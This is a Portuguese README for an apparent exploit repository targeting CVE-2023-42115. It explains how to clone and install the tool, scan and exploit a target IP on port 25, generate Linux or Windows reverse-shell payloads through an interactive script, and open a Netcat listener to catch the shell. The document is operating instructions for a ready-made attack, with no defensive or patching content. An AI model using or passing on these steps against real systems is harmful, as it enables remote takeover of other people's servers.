
Gerador de exploit e payload de reverse shell baseado em Python para CVE-2023-42115, com modos de varredura e exploração e criação de payload multiplataforma.
Este repositório contém dois scripts Python:
exploit.py: Um script para explorar a CVE-2023-42115.generate_payload.py: Um script para gerar payloads de reverse shell.Antes de executar os scripts, certifique-se de que você tenha o Python 3 instalado no seu sistema.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Instale as bibliotecas Python necessárias usando pip. Execute o seguinte comando para instalar todas as dependências necessárias listadas em requirements.txt:
pip install -r requirements.txt
exploit.py
Este script explora a vulnerabilidade CVE-2023-42115.
python exploit.py -t <target_ip> -p <target_port> [options]
Opções:
-t: O endereço IP do alvo.
-p: A porta do serviço alvo.
Exemplo:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Este script gera um payload de reverse shell com base na entrada do usuário.
python generate_payload.py
Passos:
O script solicitará as seguintes informações:
A. Tipo de payload ( linux ou windows)
B. IP local: endereço para a conexão reversa
C. Porta Local: para a conexão reversa ** I: Se você estiver atrás de um roteador ou usando NAT, certifique-se de configurar o encaminhamento de porta correto para o seu dispositivo executando o Netcat.**
D. Nome do arquivo de saída (ex.: payload.sh para Linux ou payload.ps1 para Windows)
Exemplo:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Você precisa configurar um listener na sua máquina local para capturar o reverse shell. Você pode usar o Netcat (nc) para isso.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
Seguindo estes passos, você deve ser capaz de criar e usar um payload para explorar a CVE-2023-42115 e receber uma conexão de reverse shell.
Se você tiver sugestões de melhorias ou quiser contribuir, abra uma issue ou envie um pull request.
Para perguntas ou suporte, entre em contato